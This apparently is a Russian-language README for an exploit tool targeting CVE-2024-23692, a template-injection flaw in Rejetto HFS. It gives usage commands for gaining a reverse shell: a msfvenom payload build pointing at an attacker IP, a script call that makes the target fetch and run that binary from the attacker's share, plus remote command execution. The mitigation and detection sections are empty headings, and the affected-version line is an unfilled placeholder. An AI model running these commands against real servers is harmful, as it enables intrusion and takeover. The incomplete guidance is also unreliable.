
Rejetto HFS (HTTP File Server) — это простой веб-файловый сервер, который упрощает обмен файлами по сети или через интернет.
Rejetto HFS (HTTP File Server) — это простой веб-файловый сервер, который обеспечивает обмен файлами по сети или через интернет. Несмотря на простоту использования, в нём была обнаружена критическая уязвимость (CVE-2024-23692), делающая сервер целью для злоумышленников.
CVE-2024-23692 — это уязвимость типа Server-Side Template Injection (SSTI), обнаруженная в Rejetto HFS. Данная уязвимость позволяет злоумышленнику внедрять и выполнять вредоносные шаблоны на сервере. При эксплуатации она может привести к удалённому выполнению кода, потенциально ставя под угрозу весь сервер и размещённые на нём данные.
Злоумышленник, эксплуатирующий эту уязвимость, может:
Получите shell с помощью вредоносного бинарного файла, созданного в msfvenom.
Примечание: оставьте nc в режиме прослушивания.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
Выполните команду удалённо.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
Для отображения результата может потребоваться около 15 секунд.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Все версии Rejetto HFS вплоть до версии [укажите последнюю уязвимую версию] включительно подвержены данной уязвимости.
Чтобы снизить риск, связанный с CVE-2024-23692, пользователям рекомендуется:
Чтобы определить, был ли ваш сервер скомпрометирован, обратите внимание на:
Для получения дополнительной помощи и поддержки обращайтесь к форумам сообщества Rejetto HFS или официальным каналам поддержки.
Этот проект лицензирован в соответствии с MIT License — подробнее см. в файле LICENSE.